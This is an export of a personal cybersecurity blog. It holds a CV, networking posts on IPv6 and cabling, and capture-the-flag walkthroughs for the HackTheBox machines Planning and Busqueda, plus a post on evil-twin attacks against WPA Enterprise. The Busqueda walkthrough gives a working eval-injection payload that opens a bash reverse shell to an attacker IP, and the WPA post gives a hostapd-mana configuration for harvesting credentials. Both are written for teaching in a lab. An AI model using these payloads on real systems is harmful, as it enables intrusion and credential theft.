[{"content":"","date":"2025-07-21","externalUrl":null,"permalink":"/no/","section":"Aldar Ali - Systemingeniør og Cybersikkerhetsentusiast","summary":"","title":"Aldar Ali - Systemingeniør og Cybersikkerhetsentusiast","type":"page"},{"content":" Erfaring Company Link Role Dates Location Guard Automation AS Systemingeniør IT Sep 2025 - Nåværende Sandefjord, Norway KDI IT-konsulent Okt 2022 - Aug 2025 Horten, Norge Sikt Praksis Systemutvikler jun 2023 - Aug 2023 Oslo, Norge Nordlaks Prosessoperatør 2018 - 2022 Stokmarknes, Norge Utdanning School Link Degree Date Offensive Security Offensive Security Wireless Professional (OSWP) 2025 Offensive Security Network Penetration Testing Essentials 2025 Universitetet i Sørøst-Norge Bachelorgrad i IT og informasjonssystemer. 2024 ","date":"2025-07-21","externalUrl":null,"permalink":"/no/resume/","section":"Aldar Ali - Systemingeniør og Cybersikkerhetsentusiast","summary":"Erfaring Company Link Role Dates Location Guard Automation AS Systemingeniør IT Sep 2025 - Nåværende Sandefjord, Norway KDI IT-konsulent Okt 2022 - Aug 2025 Horten, Norge Sikt Praksis Systemutvikler jun 2023 - Aug 2023 Oslo, Norge Nordlaks Prosessoperatør 2018 - 2022 Stokmarknes, Norge Utdanning School Link Degree Date Offensive Security Offensive Security Wireless Professional (OSWP) 2025 Offensive Security Network Penetration Testing Essentials 2025 Universitetet i Sørøst-Norge Bachelorgrad i IT og informasjonssystemer.","title":"CV","type":"page"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/tags/internet-protocol/","section":"Tags","summary":"","title":"Internet Protocol","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/categories/internet-protocols/","section":"Categories","summary":"","title":"Internet Protocols","type":"categories"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/tags/internettprotokoll/","section":"Tags","summary":"","title":"Internettprotokoll","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/categories/internettprotokoller/","section":"Categories","summary":"","title":"Internettprotokoller","type":"categories"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/tags/ip-addressing/","section":"Tags","summary":"","title":"IP Addressing","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/tags/ip-adressering/","section":"Tags","summary":"","title":"IP-Adressering","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/tags/ipv6/","section":"Tags","summary":"","title":"IPv6","type":"tags"},{"content":" Introduksjon # Etter hvert som internett fortsetter sin eksponentielle vekst, har begrensningene til IPv4 blitt stadig tydeligere. Møt IPv6 (Internet Protocol versjon 6), internettprotokollen for neste generasjon designet for å erstatte IPv4 og adressere dets mangler. Med sitt enormt utvidede adresserom og forbedrede funksjoner, er IPv6 ikke bare en oppgradering—det er en fundamental nytenkning av hvordan enheter kommuniserer på internett.\nIPv6 Grunnleggende # IPv6-adresser er 128 bits lange og gir et astronomisk antall unike adresser—omtrent 340 undecillion (3,4 × 10^38). Dette massive adresserommet sikrer at vi ikke går tom for IP-adresser i overskuelig fremtid.\nAdressestruktur # 128-bit adresser representert som 32 heksadesimale tall Organisert i 8 kvartetter med 4 heksadesimale siffer hver Separert med kolon (f.eks. 2001:0db8:85a3:0000:0000:8a2e:0370:7334) IPv6 Adressetyper # 1. Global Unicast Adresser # Global Unicast Adresser er IPv6-ekvivalenten til offentlige IPv4-adresser—de er offentlig rutbare over internett og identifiserer enheter unikt på verdensbasis.\nHovedkarakteristikker:\nStarter med 2000::/3 (de første tre bitene er 001) Kan begynne med heksadesimal 2 eller 3 Strukturert i tre deler: Global Routing Prefix (tildelt av IANA) Subnet ID Vert/Grensesnitt-identifikator De første tre bitene (001) er avgjørende for identifikasjon. I binært oversettes dette til:\n0010 (binært) = 2 (heksadesimalt) 0011 (binært) = 3 (heksadesimalt) Dette er grunnen til at Global Unicast-adresser typisk starter med 2 eller 3, vanligvis representert som 2000::/3.\n2. Multicast Adresser # IPv6 multicast muliggjør effektiv en-til-mange kommunikasjon, som lar en enkelt pakke nå flere destinasjoner samtidig.\nAdresseformat:\n| 11111111 | Flags | Scope | Group ID | | 8 bits | 4 bits| 4 bits| 112 bits | Starter alltid med FF (de første 8 bitene er alle enere) Flags: Definerer adresseegenskaper Scope: Bestemmer rekkevidden til multicast-trafikk Group ID: Identifiserer den spesifikke multicast-gruppen Vanlige Scope-verdier:\nLink-local scope (FF02::) FF02::1 - Alle noder på det lokale nettverkssegmentet FF02::2 - Alle rutere på det lokale nettverkssegmentet Multicast-grupper lar enheter selektivt motta trafikk. For eksempel kan en videostrømming-server sende data til en multicast-gruppe, og bare enheter som har tilsluttet seg den gruppen vil motta strømmen. 3. Link-Local Adresser # Link-local adresser gir automatisk adressering for kommunikasjon innenfor et enkelt nettverkssegment.\nKarakteristikker:\nFormat: FE80::/10 Første 10 bits: 1111 1110 10 Etterfulgt av 54 nuller Siste 64 bits: Grensesnitt-ID Ikke rutbar utenfor det lokale nettverkssegmentet Tilsvarende IPv4 APIPA-adresser (169.254.0.0/16) Link-local adresser er spesielt nyttige for:\nAutomatisk konfigurasjon uten DHCP Ruter-til-ruter kommunikasjon på samme segment Neighbor discovery protocol-operasjoner 4. Unique Local Adresser # Unique Local Adresser (ULA) er IPv6s svar på privat adressering, tilsvarende RFC 1918-adresser i IPv4. Format:\nFC00::/7 eller FD00::/7 Den 8. bit (L bit) indikerer lokal tildeling Begynner vanligvis med FD for lokalt tildelte adresser Disse adressene er:\nRutbare innenfor en organisasjon Ikke rutbare på det offentlige internett Sammenlignbare med IPv4 private områder (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) 5. Spesialformål Adresser # Loopback Adresse # ::1 (alle nuller unntatt den siste bit) Brukt for testing av lokal IPv6-stack Ekvivalent til 127.0.0.1 i IPv4 Uspesifisert Adresse # :: (alle 128 bits er null) Brukt når en enhet ikke har en tildelt IPv6-adresse Vanlig i: Neighbor solicitation-meldinger Duplicate Address Detection (DAD) Første DHCP-forespørsler 6. Solicited-Node Multicast Adresser # Disse spesialformål multicast-adressene muliggjør effektiv adresseoppløsning i IPv6-nettverk, og erstatter den broadcast-baserte ARP som brukes i IPv4.\nEksempel:\nUnicast-adresse: 2001:DB8:\u0026#x1f522;5678 Siste 24 bits: 34:5678 Solicited-node multicast: FF02::1:FF34:5678 Fordeler:\nReduserer nettverkstrafikk sammenlignet med broadcast ARP Bare noder med matchende adressesuffiks behandler forespørsler Essensielt for Neighbor Discovery Protocol Muliggjør effektiv Duplicate Address Detection Adresse Konfigureringsmetoder # EUI-64 Prosess # EUI-64 er en metode for automatisk å generere 64-bit grensesnitt-identifikatoren fra en enhets 48-bit MAC-adresse.\nProsess: Dette skaper en globalt unik grensesnitt-ID basert på maskinvareadressen, med den flippede 7. bit som indikerer om adressen er lokalt administrert.\nDynamisk IPv6 Tildeling # IPv6 støtter flere metoder for dynamisk adressekonfigurasjon:\nStateless Address Autoconfiguration (SLAAC)\nEnheter genererer sine egne adresser Bruker ruteradvertisementer for nettverksprefiks Kombinerer prefiks med EUI-64 eller tilfeldig grensesnitt-ID DHCPv6 (Stateful)\nServer tildeler komplette adresser Gir ekstra konfigurasjonsinformasjon Tilsvarende DHCP i IPv4 Stateless DHCPv6\nKombinasjon av SLAAC og DHCPv6 Adresse fra SLAAC, andre parametere fra DHCPv6 Konklusjon # IPv6 representerer en betydelig evolusjon i internettprotokoller, og adresserer begrensningene til IPv4 samtidig som det introduserer nye muligheter. Dets enorme adresserom, forbedret effektivitet gjennom multicast-adressering, og forenklet autokonfigurasjon gjør det essensielt for fremtidens nettverk.\nEtter hvert som vi fortsetter å koble flere enheter til internett—fra smarttelefoner til IoT-sensorer—blir IPv6s rolle stadig viktigere. Å forstå dets adressetyper, konfigureringsmetoder og spesielle funksjoner er essensielt for nettverksprofesjonelle og alle som jobber med moderne internett-infrastruktur.\nOvergangen til IPv6 handler ikke bare om å ha flere adresser; det handler om å bygge et mer effektivt, skalerbart og funksjonsrikt internett som kan støtte neste generasjon tilkoblede enheter og tjenester.\n","date":"2025-07-02","externalUrl":null,"permalink":"/no/posts/ipv6/","section":"Posts","summary":"En omfattende guide for å forstå IPv6, dets funksjoner og fordeler fremfor IPv4.","title":"IPv6: Internettprotokollen for neste generasjon","type":"posts"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/categories/nettverk/","section":"Categories","summary":"","title":"Nettverk","type":"categories"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/tags/nettverk/","section":"Tags","summary":"","title":"Nettverk","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/categories/networking/","section":"Categories","summary":"","title":"Networking","type":"categories"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/tags/networking/","section":"Tags","summary":"","title":"Networking","type":"tags"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/posts/","section":"Posts","summary":"","title":"Posts","type":"posts"},{"content":"","date":"2025-07-02","externalUrl":null,"permalink":"/no/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"2025-06-14","externalUrl":null,"permalink":"/categories/cabling/","section":"Categories","summary":"","title":"Cabling","type":"categories"},{"content":"","date":"2025-06-14","externalUrl":null,"permalink":"/no/tags/ccna/","section":"Tags","summary":"","title":"CCNA","type":"tags"},{"content":"","date":"2025-06-14","externalUrl":null,"permalink":"/no/tags/ethernet/","section":"Tags","summary":"","title":"Ethernet","type":"tags"},{"content":"","date":"2025-06-14","externalUrl":null,"permalink":"/no/tags/fiber-optics/","section":"Tags","summary":"","title":"Fiber Optics","type":"tags"},{"content":"","date":"2025-06-14","externalUrl":null,"permalink":"/no/categories/kabling/","section":"Categories","summary":"","title":"Kabling","type":"categories"},{"content":"Kabling er den fysiske livslinjen som frakter data i nettverket. Det kan ikke overdrives hvor viktig kabling er, fordi den direkte påvirker ytelse, skalerbarhet og pålitelighet.\nKoaksialkabler # Tidligere var koaksial ryggraden i mange nettverk, og den brukes fortsatt i enkelte spesialiserte miljøer. I kablede nett blir leder ofte laget av kobber, ettersom kobber leder strøm godt og har høy strekkfasthet. De to vanligste kobberkablene du møter i nettverk er koaksialkabler (coax) og tvunnet parkabel.\nKoaksial er konstruert med ett hovedmål: å beskytte mot elektromagnetisk interferens (EMI). Vi vil ikke at elektromagnetiske bølger i omgivelsene, som radiobølger, skal fanges opp av kabelen og forstyrre data. Samtidig vil vi ikke at kabelen skal fungere som en antenne og sende ut forstyrrelser.\nEt koaksialkabel beskytter signalet ved at det sendes i en senterleder (vanligvis kobber) omgitt av et dielektrisk isolasjonslag. Rundt dette ligger ofte en folieskjerm som demper EMI, og utenpå der igjen en flettet metalskjerm for ytterligere beskyttelse. Alt omsluttes av en ytre plastkappe.\nTyper koaksialkabler # Vanlige typer er RG‑59 og RG‑6 (ofte i hjemmenett), RG‑58 (eldre 10BASE2), og RG‑8/U (eldre 10BASE5).\nTvunnet parkabel # Tvunnet parkabel er svært utbredt i dag.\nUskjermet tvunnet parkabel (UTP) # Parene tvinnes for å motvirke EMI. To gode ledere tvinnes slik at hver leder «skjermer» den andre. I UTP er det ingen ekstra skjerm (ingen folie) – kun tvistingen gir beskyttelse.\nSkjermet tvunnet parkabel (STP) # Når UTP ikke er nok – f.eks. i miljøer med mye EMI – brukes STP. Her tvinnes parene som vanlig, men hvert par er i tillegg folieskjermet. Noen STP‑varianter har også flettet skjerm rundt alle åtte lederne.\nSTP koster mer (mer materiale), mens UTP oftest er rimeligst og mest brukt. STP kan på grunn av bedre skjerming ofte støtte høyere datahastigheter.\nPlenum‑klassifisert kabling # Plenumområder er f.eks. over nedsenket tak eller under hevet gulv som brukes av ventilasjonsanlegg (HVAC) til luftretur. Vanlig kabel i slike områder kan avgi giftige gasser ved brann. Plenum‑klassifiserte kabler er laget for å begrense dette.\nKontakter # RJ‑45 er vanligst for Ethernet. RJ‑11 og RJ‑14 brukes for telefoni.\nTerminering – standarder # Det finnes standarder for hvilke farger som skal i hvilke pinner. De vanligste er T568A og T568B. Ingen er «bedre» – viktigst er å bruke samme standard i begge ender og i patchpanel/jack. I praksis er T568B mest brukt i dag.\nEthernet‑standarder for tvunnet parkabel # Tvunnet parkabel deles inn i kategorier. Ulike Ethernet‑standarder krever ulike kategorier og har egne grenser for hastighet og avstand.\nEthernet‑kabeltyper # En typisk Ethernet‑kabel har RJ‑45 i begge ender. Hver kontakt har åtte pinner. Kabler er enten rettede (straight‑through) eller kryssede (crossover).\nFor å forstå forskjellen på rette og kryssede kabler, må vi se hvordan ulike enheter sender/mottar på RJ‑45.\nPCer, rutere og trådløse aksesspunkter (MDI) bruker pinnene 1 og 2 til å sende, og 3 og 6 til å motta.\nHuber, broer og svitsjer (MDI‑X) gjør det motsatte: sender på 3 og 6, og mottar på 1 og 2.\nRett kabel (Straight‑Through) # En rett kabel kobler pinne 1 i den ene enden til pinne 1 i den andre, osv.\nKobler du en MDI‑enhet til en MDI‑X‑enhet med rett kabel (f.eks. PC → svitsj), fungerer det – fordi utsending på den ene matcher mottak på den andre.\nMen kobler du to like enheter (f.eks. ruter → ruter) med rett kabel, vil begge sende på 1\u0026amp;2 og motta på 3\u0026amp;6, så signalene «møtes» og ingen mottar korrekt.\nKrysskoblet kabel (Crossover) # Løsningen er å krysse lederne slik at send på den ene siden treffer mottak på den andre – og omvendt.\nModerne nett # I dag har mye utstyr auto MDI‑X og forhandler automatisk hvem som bruker hvilke pinner til send/motta. I nyere standarder med høyere hastigheter brukes alle 8 pinnene for både sending og mottak.\n10BASE‑T og 100BASE‑TX (eldre) # Hastighet: 10 og 100 Mb/s Pinner brukt: 4 ledere (1, 2, 3, 6) Pinnene 4, 5, 7, 8: Ikke brukt 1000BASE‑T (Gigabit Ethernet) # Hastighet: 1 Gb/s Pinner brukt: Alle 8 Endring: Krever alle par Fiberoptiske kabler # Fiber gir en stor fordel over kobber: immunitet mot EMI. Kobber bruker elektromagnetiske bølger; fiber bruker lys – og påvirkes ikke av EMI.\nFysikken bak fiber # Brytningsindeks # Grunnprinsippet er brytningsindeks. Lys endrer retning og hastighet når det går mellom medier med ulik indeks (f.eks. luft → glass).\nFiberens oppbygning # En fiber består av to glasslag med ulik brytningsindeks:\nKjerne: Innerste glasset der lyset går Kledning: Ytre glasslaget rundt kjernen Under produksjon doper man kjernen/kledningen ulikt, slik at lyset «holder seg» i kjernen ved totalrefleksjon og ikke lekker ut i kledningen.\nTyper fiber # Multimode‑fiber (MMF) # Kjerne: Større Lysbaner: Flere moduser (flere mulige stier) Avstand: Omtrent opptil 2 km Singlemode‑fiber (SMF) # Kjerne: Mye mindre Lysbaner: Én modus (én sti) Avstand: Betydelig lengre enn MMF Hva betyr «modus»? # En modus er en bestemt lysbane gjennom fiberen. Større kjerne = flere mulige baner; mindre kjerne = bare én.\nMultimode‑forsinkelsesforvrengning # I MMF kan ulike lysbaner bruke ulik tid: en «hoppete» vei kan bli tregere enn en mer direkte. Over lange lengder kan bitene «bytte plass» og korruptere data. Dette begrenser MMF‑avstander.\nHvorfor singlemode løser dette # SMF har så liten kjerne at det bare finnes én vei for lyset. Alle biter går samme rute, og ingen kan «ta igjen» en annen – derfor er lange avstander mulig uten slik forvrengning.\nEthernet‑standarder for fiber # Også fiber klassifiseres etter hastighet og avstand.\nFiberkontakter # Vanlige kontakter er SC, LC, ST og MT‑RJ. De sørger for korrekt justering og pålitelig signaloverføring.\nReferanser # https://www.phoenixcontact.com/en-pc/technologies/copper-based-data-cabling https://tripplite.eaton.com/products/ethernet-cable-types https://en.wikipedia.org/wiki/Medium-dependent_interface https://en.wikipedia.org/wiki/Refractive_index https://rfindustries.com/fiber-optic-cable-types-multimode-and-single-mode/ ","date":"2025-06-14","externalUrl":null,"permalink":"/no/posts/network-cables/","section":"Posts","summary":"En oversikt over nettverkskabling, inkludert koaksialkabler, tvunnet parkabel (UTP og STP) og fiberoptikk. Lær om oppbygning, typer og hvordan de påvirker ytelse. Nyttig for CCNA‑forberedelser.","title":"Nettverkskabling","type":"posts"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/categories/ctf/","section":"Categories","summary":"","title":"CTF","type":"categories"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/tags/cve-2024-9264/","section":"Tags","summary":"","title":"Cve-2024-9264","type":"tags"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/tags/grafana/","section":"Tags","summary":"","title":"Grafana","type":"tags"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/tags/hackthebox/","section":"Tags","summary":"","title":"Hackthebox","type":"tags"},{"content":" HackTheBox-Planning maskin gjennomgang # Denne gjennomgangen detaljerer prosessen med å kompromittere Planning-maskinen fra HackTheBox. Den demonstrerer rekognoseringsteknikker, sårbarhet identifikasjon, utnyttelse av en kritisk Grafana-sårbarhet, og privilegie-eskalering metoder.\nInnledende Enumerering # Jeg startet med å utføre en omfattende port-skanning ved hjelp av Nmap for å identifisere åpne porter og kjørende tjenester:\nnmap -sV -sT -sC -T4 10.10.11.68 Skanningen avslørte flere åpne porter, inkludert webtjenester som ville være vår innledende angrepsflett. For å fortsette utforskningen, la jeg til måldomenet i hosts-filen min:\necho \u0026#34;10.10.11.68 planning.htb\u0026#34; | sudo tee -a /etc/hosts Subdomain Enumerering # Etter initial rekognisering kjørte jeg subdomain-enumerering for å oppdage ytterligere angrepsflett:\nJeg oppdaget et interessant subdomain som kjørte Grafana, et overvåknings- og observabilitetsverktøy.\nGrafana Versjon Identifikasjon # Ved å undersøke Grafana-instansen identifiserte jeg versjonen som kjørte:\nDenne versjonen viste seg å være sårbar for CVE-2024-9264, en kritisk sårbarhet.\nSårbarhet Forskning # Jeg undersøkte sårbarheten ytterligere og fant detaljert informasjon om CVE-2024-9264:\nExploitutvikling # Jeg lastet ned et exploit-repositorium fra GitHub:\nOg forberedte exploit for bruk:\nUtnyttelse # Med exploitet klar, gjennomførte jeg angrep mot den sårbare Grafana-instansen:\nDette ga meg initial fotfeste på systemet.\nSSH Port Forwarding # For bedre tilgang satte jeg opp SSH port-forwarding:\nInitial Tilgang og Enumerering # Etter å ha fått initial tilgang, startet jeg enumerering av systemet:\nCrontab-UI Oppdagelse # Under enumerering oppdaget jeg en crontab-ui tjeneste som kjørte:\nPrivilegie Eskalering # Jeg brukte crontab-ui til å lage nye scheduled jobs for privilegie-eskalering:\nRoot Tilgang # Gjennom clever utnyttelse av crontab-systemet oppnådde jeg root-tilgang:\nKonklusjon # Planning-maskinen demonstrerer flere viktige cybersikkerhetskonsepter:\nSubdomain Enumerering: Viktigheten av grundig rekognisering CVE Utnyttelse: Hvordan kjente sårbarheter kan utnyttes Scheduled Task Utnyttelse: Bruk av system-tjenester for eskalering Port Forwarding: Teknikker for å opprettholde tilgang Viktige Lærdommer # Alltid enumerer subdomains grundig Hold alle system-komponenter oppdaterte Overvåk og sikre administrative grensesnitt Implementer principe of least privilege for system-tjenester Denne gjennomgangen er for utdanningsformål. Sørg alltid for at du har tillatelse før du utfører penetrasjonstesting.\n","date":"2025-05-21","externalUrl":null,"permalink":"/no/posts/htb-planning/","section":"Posts","summary":"I denne gjennomgangen demonstrerer jeg hvordan man kompromitterer Planning-maskinen på HackTheBox ved å oppdage en sårbar Grafana-instanse, utnytte CVE-2024-9264 for initial tilgang, og eskalere privilegier gjennom en crontab-ui tjeneste.","title":"HackTheBox-Planning maskin gjennomgang","type":"posts"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/categories/penetrasjonstesting/","section":"Categories","summary":"","title":"Penetrasjonstesting","type":"categories"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/categories/penetration-testing/","section":"Categories","summary":"","title":"Penetration Testing","type":"categories"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/tags/privilege-escalation/","section":"Tags","summary":"","title":"Privilege Escalation","type":"tags"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/tags/privilegie-eskalering/","section":"Tags","summary":"","title":"Privilegie Eskalering","type":"tags"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/no/categories/s%C3%A5rbarhetsutnyttelse/","section":"Categories","summary":"","title":"Sårbarhetsutnyttelse","type":"categories"},{"content":"","date":"2025-05-21","externalUrl":null,"permalink":"/categories/vulnerability-exploitation/","section":"Categories","summary":"","title":"Vulnerability Exploitation","type":"categories"},{"content":"","date":"2025-05-11","externalUrl":null,"permalink":"/tags/command-injection/","section":"Tags","summary":"","title":"Command Injection","type":"tags"},{"content":"","date":"2025-05-11","externalUrl":null,"permalink":"/categories/cybersecurity/","section":"Categories","summary":"","title":"Cybersecurity","type":"categories"},{"content":" HackTheBox-Busqueda Machine Walkthrough # This is a walkthrough of the HackTheBox machine Busqueda. The machine is a retired machine on HackTheBox and provides great practice for beginners focusing on web application vulnerabilities and privilege escalation techniques.\nInitial Enumeration # First, we need to enumerate the machine. We\u0026rsquo;ll use Nmap to scan the machine for open ports and services:\nnmap -sV -sT -sC -T4 10.10.11.208 The scan results show that the machine has two open ports:\nPort 22: Running OpenSSH 8.9p1 Port 80: Running Apache httpd 2.4.52 Web Enumeration # To access the web server, we need to add the IP address of the machine to our hosts file:\necho \u0026#34;10.10.11.208 searcher.htb\u0026#34; | sudo tee -a /etc/hosts I also checked for hidden or uncovered pages on the website using feroxbuster, but didn\u0026rsquo;t find anything significant:\nNow we can access the web server by going to http://searcher.htb in our web browser:\nVulnerability Identification # After examining the web application, I discovered it was running \u0026ldquo;Searchor\u0026rdquo; version 2.4.0. Researching this software on GitHub led me to the Searchor repository.\nLooking at the release notes for Searchor 2.4.2, I found that it patched a vulnerability present in earlier versions, including 2.4.0:\nExamining the patch details revealed a command injection vulnerability in the search functionality due to the use of an eval() statement on unsanitized user input:\nUnderstanding the eval() Vulnerability # The vulnerability exists because the application doesn\u0026rsquo;t properly validate user inputs in the search parameters. A remote attacker can supply a specially crafted query to pass arbitrary code to an eval() statement, resulting in code execution.\nTo confirm this vulnerability, I downloaded and analyzed Searchor 2.4.0 locally:\nwget https://github.com/ArjunSharda/Searchor/archive/refs/tags/v2.4.0.zip unzip v2.4.0.zip Examining the code in main.py:\nnano Searchor-2.4.0/src/searchor/main.py The search() function accepts four parameters, and we have control over two of them: engine and query. Both parameters are passed directly to an eval() statement without proper sanitization.\nAfter installing Searchor 2.4.0 locally:\npip install searchor==2.4.0 I verified the vulnerability using a test payload:\nsearchor search Google \u0026#34;\u0026#39;)+ str(__import__(\u0026#39;os\u0026#39;).system(\u0026#39;id\u0026#39;))#\u0026#34; The successful execution of the injected id command confirmed that this vulnerability would work on the remote host running the same version.\nExploitation # To gain initial access, I set up a Netcat listener on port 80:\nnc -nlvp 80 If you have a firewall like UFW enabled, you\u0026rsquo;ll need to open the port:\nsudo ufw allow 80 I then crafted a command injection payload to obtain a reverse shell:\n\u0026#39;+ __import__(\u0026#39;os\u0026#39;).popen(\u0026#39;bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.5/80 0\u0026gt;\u0026amp;1\u0026#34;\u0026#39;).read() +\u0026#39; Payload Explanation: # __import__(\u0026#39;os\u0026#39;) # Dynamically load Python\u0026#39;s os module .popen( … ).read() # Open a subprocess, read its stdout Inside popen():\nbash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.16.5/80 0\u0026gt;\u0026amp;1\u0026#34; bash -c: Tells bash to run the following command string bash -i: Starts an interactive shell \u0026gt;\u0026amp; /dev/tcp/10.10.16.5/80 0\u0026gt;\u0026amp;1: Redirects stdout and stderr to your listener at 10.10.16.5:80, and stdin from the same socket The injection was successful, giving me a reverse shell on the target:\nI located the user flag in /home/svc/user.txt:\nPrivilege Escalation # During post-exploitation enumeration, I found credentials in the .gitconfig file:\nFurther investigation revealed more credentials and a subdomain gitea.searcher.htb in the /var/www/app/.git/config file:\nUsing the discovered password jh1usoih2bkjaspwe92, I established an SSH connection as user svc:\nssh svc@10.10.11.208 Next, I added the discovered subdomain to my hosts file:\necho \u0026#34;10.10.11.208 gitea.searcher.htb\u0026#34; | sudo tee -a /etc/hosts Visiting gitea.searcher.htb revealed a Gitea instance:\nIn the \u0026ldquo;Explorer\u0026rdquo; section, I found two users: cody and administrator:\nI logged in as cody using the previously discovered password:\nTo progress further, I checked what commands user svc could run with sudo permissions:\nsudo -l The user svc could run the /opt/scripts/system-checkup.py script with sudo privileges, but only with execution rights:\nRunning the script to understand its functionality:\nsudo /usr/bin/python3 /opt/scripts/system-checkup.py * The script allowed checking Docker containers:\nsudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps Using the docker-inspect option to examine the containers:\nAfter studying the docker-inspect documentation, I found that the {{json .}} format template renders all container information in JSON format. This template is perfect for the docker-inspect argument of the script:\nsudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect \u0026#39;{{json .}}\u0026#39; gitea | jq I discovered the administrator password yuiu1hoiu4i5ho1uh and used it to login to Gitea:\nWith access to the private scripts repository, I could examine the system-checkup.py script:\nThe script revealed a key vulnerability: when executing the full-checkup argument, it runs ./full-checkup.sh using a relative path instead of an absolute path.\nThis allowed me to create my own malicious full-checkup.sh script in a directory of my choice:\nAfter making it executable:\nchmod +x /tmp/full-checkup.sh I set up a Netcat listener on port 8060:\nnc -nvlp 8060 And if necessary, allowed the port through my firewall:\nsudo ufw allow 8060 Executing the script from the /tmp directory granted me a root shell, allowing me to retrieve the root flag:\nConclusion # The Busqueda machine demonstrated several important security concepts:\nThe dangers of using eval() with unsanitized user input The importance of proper credential management The risks of using relative paths in privileged scripts This machine provided valuable lessons in web application security, command injection vulnerabilities, and privilege escalation techniques.\n","date":"2025-05-11","externalUrl":null,"permalink":"/posts/htb-busqueda/","section":"Posts","summary":"A step-by-step guide to solve the Busqueda machine from HackTheBox","title":"HackTheBox-Busqueda machine walkthrough","type":"posts"},{"content":"","date":"2025-05-11","externalUrl":null,"permalink":"/tags/htb/","section":"Tags","summary":"","title":"HTB","type":"tags"},{"content":"","date":"2025-05-11","externalUrl":null,"permalink":"/tags/walkthrough/","section":"Tags","summary":"","title":"Walkthrough","type":"tags"},{"content":"","date":"2025-05-11","externalUrl":null,"permalink":"/tags/web-exploitation/","section":"Tags","summary":"","title":"Web Exploitation","type":"tags"},{"content":" WPA Enterprise # WPA Enterprise bruker Extensible Authentication Protocol (EAP), som er et rammeverk for autentisering som tillater en rekke forskjellige autentiseringsmetoder.\nVanlige EAP-metoder # EAP-TLS # Hva den gjør: Både klienten og serveren presenterer sertifikater. Hvordan den fungerer: Gjensidig autentisering skjer; ingen brukernavn eller passord er nødvendig. Anses som svært sikker på grunn av sertifikatbasert validering. EAP-TTLS # Hva den gjør: Bare serveren trenger et sertifikat. Hvordan den fungerer: Klienten verifiserer serverens sertifikat først. En sikker tunnel opprettes for å overføre brukerlegitimasjon (f.eks. via PAP, CHAP, eller MS-CHAPv2). PEAP # Hva den gjør: Bare serveren har et sertifikat. Hvordan den fungerer: Etter å ha verifisert serveren, etableres en sikker tunnel. Brukere autentiseres inne i denne tunnelen, typisk med MS-CHAPv2. Angrepsvektorer på WPA Enterprise # Evil Twin Attack med Mana # WPA Enterprise-nettverk kan være sårbare for Evil Twin-angrep hvor en ondsinnet tilgangspunkt (Evil Twin) etterligner et legitimt bedrifts-tilgangspunkt.\nForberedelse av Angrep # Installere nødvendige verktøy: sudo apt update sudo apt install hostapd-mana freeradius Konfigurere hostapd-mana: sudo nano /etc/hostapd-mana/mana.conf Konfigurasjonsfil for Mana # # Basic configuration interface=wlan0 ssid=CorporateWiFi channel=6 hw_mode=g # Enable Mana enable_mana=1 mana_wpe=1 # EAP configuration ieee8021x=1 eap_server=1 eap_user_file=/etc/hostapd-mana/mana.eap_user ca_cert=/etc/ssl/certs/ca.pem server_cert=/etc/ssl/certs/server.pem private_key=/etc/ssl/private/server.key Certificate Harvesting # Når klienter prøver å koble til Evil Twin-tilgangspunktet, kan vi fange opp:\nBrukerlegitimasjon (brukernavn/passord) Sertifikatinformasjon Handshake-data Overvåking og Logging # # Start mana med logging sudo hostapd-mana /etc/hostapd-mana/mana.conf # Overvåk log-filer tail -f /var/log/hostapd-mana.log FreeRADIUS Integrasjon # For mer avanserte angrep kan vi integrere med FreeRADIUS:\n# Konfigurer FreeRADIUS for mana sudo nano /etc/freeradius/3.0/clients.conf Mottitak og Beskyttelse # For Organisasjoner: # Implementer sertifikatvalidering Bruk sterke EAP-metoder som EAP-TLS Overvåk for uautoriserte tilgangspunkt Implementer Network Access Control (NAC) For Brukere: # Verifiser alltid sertifikater Unngå å koble til usikre nettverk Bruk VPN når mulig Hold enheter oppdaterte Hands-on Demonstration # Oppsett av Test-miljø # # Opprett virtuelt miljø for testing sudo ip netns add testns sudo ip link set wlan1 netns testns # Konfigurer test-grensesnitt sudo ip netns exec testns ip link set wlan1 up Kjøring av Angrep # Start Evil Twin: sudo hostapd-mana /etc/hostapd-mana/mana.conf Overvåk tilkoblinger: sudo tcpdump -i wlan0 -w capture.pcap Analyser resultater: wireshark capture.pcap Etiske Hensyn # Lovlige Aspekter # Kun utfør på egne nettverk eller med eksplisitt tillatelse Følg lokale lover og forskrifter Respekter andres personvern Ansvarlig Disclosure # Rapporter sårbarheter til riktige parter Gi organisasjoner tid til å fikse problemer Dokumenter funn ordentlig Konklusjon # WPA Enterprise-nettverk, selv om de er mer sikre enn WPA Personal, kan fortsatt være sårbare for sofistikerte angrep. Forståelse av disse angrepsvektorene er avgjørende for både angripere og forsvarere.\nViktige Takeaways: # Sertifikatvalidering er kritisk Brukertränning er essensielt 